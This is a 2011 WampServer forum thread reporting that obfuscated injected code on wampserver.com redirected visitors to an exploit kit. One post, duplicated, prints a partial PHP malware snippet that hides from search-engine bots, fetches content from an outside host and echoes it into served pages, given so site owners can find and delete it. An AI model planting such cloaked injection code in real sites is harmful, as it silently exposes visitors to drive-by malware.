WampServer
Apache, PHP, MySQL
on Windows
Injected malicious Javascript on wampserver.com
Posted by:
positronJon
(---.hsd1.md.comcast.net)
Date: October 21, 2011 03:45AM
There is injected malicious javascript on the main page of wampserver.com, it's redirecting to an exploit kit that exploits older version of PDF and Java, which undoubtedly drops malware. It's at the very bottom of the main page.
Here is a short blog post outlining the injected code: [somethingsec.blogspot.com]
Here is a short blog post outlining the injected code: [somethingsec.blogspot.com]
Re: Injected malicious Javascript on wampserver.com
Posted by:
sTimulated
(---.as13285.net)
Date: October 21, 2011 09:55AM
What does this mean to us users?
What needs to be clicked to get redirected?
What needs to be clicked to get redirected?
Re: Injected malicious Javascript on wampserver.com
Posted by:
positronJon
(158.74.17.---)
Date: October 21, 2011 04:20PM
Nothing. It's an obfuscated Iframe. It redirects you automatically (in the background) when you visit the page.
Re: Injected malicious Javascript on wampserver.com
Posted by:
stevenmartin99
(---.b-ras1.srl.dublin.eircom.net)
Date: October 21, 2011 04:29PM
Iv sent it onto site owner- will be sorted soon
Steven Martin
stevenmartin99@gmail.com
stevenmartin99@hotmail.com
PampServer.com - [pampserver.com]
Steven Martin
stevenmartin99@gmail.com
stevenmartin99@hotmail.com
PampServer.com - [pampserver.com]
Re: Injected malicious Javascript on wampserver.com
Posted by:
sharp1001
(---.cust.bredband2.com)
Date: October 22, 2011 06:38AM
Hi...
After spending 18 Hours, now i found out the Solution/Removal of this Malware from Websites.
1. Download to your whole website
2. Manually find out this given Malicious code and DELETE it from ALL of your web-pages.
Malicious Code:
_______________________________________
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&
----
-----
----
----
---------
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O"
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
________________________________________________
This above Malicious Code is generating that Link (GET [m-e.crossfitharlem.net]...)
EnJoy & Good Luck
After spending 18 Hours, now i found out the Solution/Removal of this Malware from Websites.
1. Download to your whole website
2. Manually find out this given Malicious code and DELETE it from ALL of your web-pages.
Malicious Code:
_______________________________________
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&
----
-----
----
----
---------
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O"
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
________________________________________________
This above Malicious Code is generating that Link (GET [m-e.crossfitharlem.net]...)
EnJoy & Good Luck
Sorry, only registered users may post in this forum.
